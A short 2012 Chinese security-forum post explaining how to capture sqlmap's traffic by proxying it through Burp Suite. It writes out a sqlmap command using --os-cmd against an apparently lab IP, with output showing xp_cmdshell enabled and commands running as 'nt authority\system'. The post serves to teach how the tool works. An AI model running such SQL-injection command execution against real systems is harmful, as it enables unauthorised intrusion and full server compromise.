切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
277 SQLMAP BS抓包[复制链接]
发表于 2012-9-28 23:59:11 | 显示全部楼层 |!read_mode!
如何抓取SQLMAP提交数据? 用v10意外还有个好方法 启动BS
  1. root@Dis9Team:~# sqlmap -u http://5.5.5.3/get.asp?id=1 --os-cmd=whoami --proxy=http://localhost:8080
  2. [21:32:09] [INFO] testing if xp_cmdshell extended procedure is usable
  3. [21:32:09] [INFO] the SQL query used returns 2 entries
  4. [21:32:09] [INFO] retrieved: " "
  5. [21:32:10] [INFO] retrieved: "1"
  6. [21:32:10] [INFO] xp_cmdshell extended procedure is usable                                                                  
  7. do you want to retrieve the command standard output? [Y/n/a] Y
  8. [21:32:20] [INFO] the SQL query used returns 2 entries
  9. [21:32:20] [INFO] retrieved: " "
  10. [21:32:20] [INFO] retrieved: "nt authority\\\\system"
  11. command standard output:    'nt authority\system'                                                                           
  12. [21:32:20] [INFO] cleaning up the database management system
  13. [21:32:20] [INFO] fetched data logged to text files under '/pen/sql/sqlmap/output/5.5.5.3'

  14. [*] shutting down at 21:32:20
复制代码

返回 nt authority\system 看BS



附件: 你需要登录才可以下载或查看附件。没有帐号?加入Team
操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-9-21 06:51

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部